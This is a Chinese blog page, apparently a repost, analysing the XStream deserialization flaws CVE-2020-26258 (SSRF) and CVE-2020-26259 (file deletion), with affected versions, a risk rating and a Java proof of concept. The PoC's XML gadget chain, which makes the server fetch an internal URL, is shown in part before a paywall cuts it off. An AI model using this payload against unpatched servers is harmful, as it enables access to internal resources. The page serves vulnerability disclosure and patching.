XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现与分析

最新推荐文章于 2024-05-14 10:45:34 发布
最新推荐文章于 2024-05-14 10:45:34 发布
阅读量3.6k 收藏
点赞数
文章标签: eclipse slam 数学建模 drools sublime text
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/smellycat000/article/details/111306539
版权
本文介绍了XStream库的两个严重安全漏洞CVE-2020-26258和26259,详细阐述了漏洞的复现过程、影响版本、风险等级,并分析了漏洞的触发机制,包括如何利用hashCode函数执行恶意操作。同时,提供了修复方案和参考文献。
摘要由CSDN通过智能技术生成

 聚焦源代码安全,网罗国内外最新资讯!

Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。

0x01 漏洞描述

Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单方法阻止了远程代码执行,但是仍然可以采用类似思路实现文件删除与服务器请求伪造。

01

影响版本

Xstream < = 1.4.14

02

修复版本

Xstream > = 1.4.15

03

风险等级

严重

0x02 PoC

CVE-2020-26258的 PoC 如下:

import com.thoughtworks.xstream.XStream;


/*
CVE-2020-26258: A Server-Side Forgery Request can be activated unmarshalling
with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host.
All versions until and including version 1.4.14
https://x-stream.github.io/CVE-2020-26258.html
Security framework of XStream not explicitly initialized, using predefined black list on your own risk.
*/
public class CVE_2020_26258 {
    public static void main(String[] args) {
        String ssrf_xml = "<map>\n" +
                "  <entry>\n" +
                "    <jdk.nashorn.internal.objects.NativeString>\n" +
                "      <flags>0</flags>\n" +
                "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
                "        <dataHandler>\n" +
                "          <dataSource class='javax.activation.URLDataSource'>\n" +
                "            <url>http://localhost:8989/internal/:</url>\n" +
                "          </dataSource>\n" +
                "          <transferFlavors/>\n" +
                "        </dataHandler>\n" +
                "        <dataLen>0</dataLen>\n" +
                "
最低0.47元/天 解锁文章
奇安信代码卫士
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android xml转object之XStream的坑!坑!坑!
lifeidroid的专栏
10-23 1361
牛逼的领导指出返回数据要xml格式,弱弱的安卓程序猿也无力回天啊!只能硬着头皮干! 第一步:xml解析有没有类似Gson/fastjson类似的工具呢?找了半天终于找到了今天的主角XStream。 先贴出要解析的xml <?xml version="1.0" encoding="UTF-8" ?> <name title="三角波"> <Wave tag="V1" seq="0"> <Samples name="张三"> 0X0
XStream1.4.16反序列化漏洞CVE-2020-26258CVE-2020-26259
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1728
XStream反序列化漏洞分析
XStream反序列化漏洞(cve-2020-26258/cve-2020-26259)
chaojixiaojingang
12-17 3603
1.漏洞描述 XStream是一个常用的Java对象和XML相互转换的工具。在运行XSteam的服务上,未授权的远程攻击者通过构造特定的序列化数据 ,可造成任意文件删除/服务端请求伪造(SSRF) 。 2.影响版本 XStream <= 1.4.14 3.漏洞POC 1)cve-2020-26259:任意文件删除 import com.thoughtworks.xstream.XStream; /* CVE-2020-26259: XStream is vulnerab...
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882,CVE-2020-14883)
weixin_45653478的博客
05-14 1016
Weblogic Pre-Auth Remote Command Execution 漏洞CVE-2020-14882, CVE-2020-14883)是针对 Oracle WebLogic Server 的两个安全漏洞CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证,而 CVE-2020-14883 则允许经过身份验证的用户在管理员控制台组件上执行任意命令。
问题记录:XStream ForbiddenClassException 异常
qq_35316141的博客
07-06 4379
XStream ForbiddenClassException 异常解决
Java反序列化漏洞分析合集-2
Aiwin的博客
10-24 256
关于Snakeyaml、xstream、c3p0、Rome、Hibernate、Jackson反序列化链子的详细分析
CVE-2020-26258 / 26259XStream反序列化漏洞公告
爱国小白帽
12-17 1182
报告编号:B6-2020-121401 报告来源:360CERT 报告作者:360CERT 更新日期:2020-12-14 0x01漏洞简述 2020年12月14日,360CERT监测发现 XStream 发布了 XStream 反序列化漏洞 的风险提示,突破编号为 CVE-2020-26259,CVE-2020-26258 ,突破等级:高危,裂缝评分:8.9。 在运行 XSteam 的服务上,未授权的远程攻击者通过 构造特定的序列化数据 ,可造成 任意文件删除/ 服务端请求伪造 。 目前该突.
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
xstream-1.4.15.jar
01-28
XStream 反序列化漏洞CVE-2020-26258 & 26259),修复jar包 xstream-1.4.15.jar Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发...
XStream 1.4.10 警告: Security framework of XStream not initialized, XStream is probably vulnerable
weixin_30872867的博客
01-20 1948
参考:www.fengyunxiao.cn XStream 1.4.10 出现警告:Security framework of XStream not initialized, XStream is probably vulnerable. 意思是:xstream 的安全框架没有初始化,xstream 容易受攻击。 解决方法:xStream对象设置默认安全防护,同时设置允许的类 ...
xstream 反序列化漏洞研究与修复
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
03-17 4889
文章目录1、简介2、举例3、漏洞4、修复 1、简介 xstream是一个用于序列化和反序列化的java库,主要是java对象和xml之间相互转换。 XStream反序列化同fastjson这种不一样的地方是fastjson会在反序列化的时候主动去调用getters和setters,而XStream反序列化过程中赋值都有Java的反射机制来完成,所以并没有这样主动调用的特性。 特点 使用方便 - XStream的API提供了一个高层次外观,以简化常用的用例 无需创建映射 - XStream的API提供了默
xstream xml转对象_【缺陷周话】第 38期——不安全的反序列化XStream
weixin_39625008的博客
12-11 520
聚焦源代码安全,网罗国内外最新资讯!*声明:《缺陷周话》栏目系列文章由奇安信代码卫士团队原创出品。未经许可,禁止转载。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。代码审计是使用静态分析发现源代码中安全缺陷的方法,辅助开发或测试人员在软件上线前较为全面地了解安全问题,防患于未然,因此一直以来都是学术界和产业界研究的热点,并已成为安全开发生命周期SDL 和DevS...
设计模式的学习(十四):备忘录模式
zgz15515397650的博客
01-03 271
备忘录模式 1、备忘录模式(Memento Pattern)在不破坏封装性的前提下,捕获一个对象的内部状态,并在该对象之外保存这个状态。备忘录模式属于行为型模式。 2、例子 比如我们完单机游戏时的存档,今天通关不了先存档,等明天有时间了再来接着打,这样就很美滋滋。也比如浏览器中的后退、数据库中的事务管理。 3、备忘录模式的优缺点 优点: 1、给用户提供了一种可以恢复状态的机制,可以使用户能够比较方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值